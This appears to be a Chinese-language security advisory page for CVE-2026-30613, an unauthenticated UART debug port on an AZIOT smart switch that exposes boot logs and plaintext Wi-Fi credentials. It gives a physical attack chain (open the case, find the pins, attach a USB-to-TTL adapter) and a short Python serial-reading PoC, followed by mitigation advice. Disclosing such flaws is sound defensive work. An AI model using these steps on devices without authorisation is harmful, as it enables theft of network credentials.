CVE-2026-30613 CVSS 4.6 中危

CVE-2026-30613 AZIOT智能开关UART信息泄露

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30613

漏洞类型

信息泄露

CVSS评分

4.6 中危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AZIOT 1 Node Smart Switch (16amp)

漏洞概述

AZIOT 1 Node Smart Switch (16amp) 软件版本1.1.9存在信息泄露漏洞。由于UART调试接口缺乏适当的访问控制，拥有物理访问权限的攻击者无需身份验证即可连接该接口，通过串行控制台读取设备的敏感信息，造成数据泄露风险。

技术细节

该漏洞的根本原因在于设备固件未对UART（通用异步收发传输器）调试接口实施严格的访问控制策略。UART接口通常用于底层调试和日志输出，在受影响版本1.1.9中，该接口在设备运行时保持开放且未启用认证机制。攻击者首先需要物理接触设备，通过拆解外壳识别UART的TX（发送）、RX（接收）和GND（接地）引脚。随后，攻击者利用USB转TTL工具将设备连接至计算机，并使用串口通信工具（如Minicom或PuTTY）建立连接。成功连接后，攻击者可以捕获设备启动时的Bootloader日志、系统内存转储或明文传输的敏感配置数据（如Wi-Fi凭证），从而完全获取设备的内部状态信息。

攻击链分析

STEP 1

物理接触

攻击者获取对AZIOT智能开关设备的物理访问权限。

STEP 2

接口定位

拆解设备外壳，在电路板上识别并定位UART调试接口的引脚（TX, RX, GND）。

STEP 3

建立连接

使用USB转TTL工具将UART接口连接到攻击者的计算机，并配置串口参数（如波特率）。

STEP 4

信息获取

通过串口终端软件读取控制台输出，获取未加密的敏感信息、日志或配置数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-30613: UART Information Disclosure
# This script demonstrates how to read data from an unauthenticated UART interface.
# Requires physical access and a USB-to-TTL adapter.

import serial
import time

def read_uart_data(port='/dev/ttyUSB0', baud_rate=115200):
    try:
        # Configure serial connection (Adjust baud rate as per device spec)
        ser = serial.Serial(port, baud_rate, timeout=1)
        print(f"[+] Connected to {port} at {baud_rate} baud.")
        print("[+] Reading data stream (Press Ctrl+C to stop)...")
        
        while True:
            if ser.in_waiting > 0:
                # Read and decode sensitive data from serial console
                data = ser.readline().decode('utf-8', errors='ignore').strip()
                if data:
                    print(data)
            time.sleep(0.1)
            
    except serial.SerialException as e:
        print(f"[-] Serial Error: {e}")
    except KeyboardInterrupt:
        print("\n[!] Exiting...")
    finally:
        if 'ser' in locals() and ser.is_open:
            ser.close()

if __name__ == "__main__":
    # Usage: python3 poc.py
    read_uart_data()

影响范围

AZIOT 1 Node Smart Switch (16amp) Software Version 1.1.9

防御指南

临时缓解措施

在无法立即升级固件的情况下，应将设备放置在受控的物理环境中，限制非授权人员的物理接触。同时，检查设备是否支持通过配置关闭调试功能，以降低信息泄露风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-30613
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-30613
3 Details https://www.cvedetails.com/cve/CVE-2026-30613/
4 VulDB https://vuldb.com/cve/CVE-2026-30613
5 Link http://aziot.com
6 Link https://github.com/dumbermore/tuya/blob/main/README.md

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表